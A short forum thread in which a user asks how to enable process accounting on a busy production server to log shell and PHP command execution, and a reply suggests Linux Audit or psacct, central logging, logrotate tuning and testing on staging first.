I've been thinking of enabling process accounting on a production server as a proactive security measure to monitor what's being ran on the system.
Looking at the initial documentation it appears that enabling process accounting on a busy system might result in a significant amount of disk space being used to log and store the system process information.
Anyone know what are the best recommendations on enabling process monitoring? Also any considerations on the setup, especially since this is a production server.
Ideally, I'd just want to log any shell commands including PHP exec(), system(), passthru(). etc..
-Tony
You might want to try Linux Audit, or psacct/acct. I haven't used either of these systems, so I can't say much their about efficacy.
If all you want to do is make your user's .bash_history persistent, give this howto a look.
If you are concerned about disk space issues, you might want to consider a central log server. You can also tweak the logrotate settings to accommodate the pace of the logs.
As for my considerations on setting up process monitoring on your production server... unless you have done this before and know exactly what you're doing, I'd recommend thoroughly testing this on a development or staging machine first. A production server is not the place to be trying new things, at least in my opinion.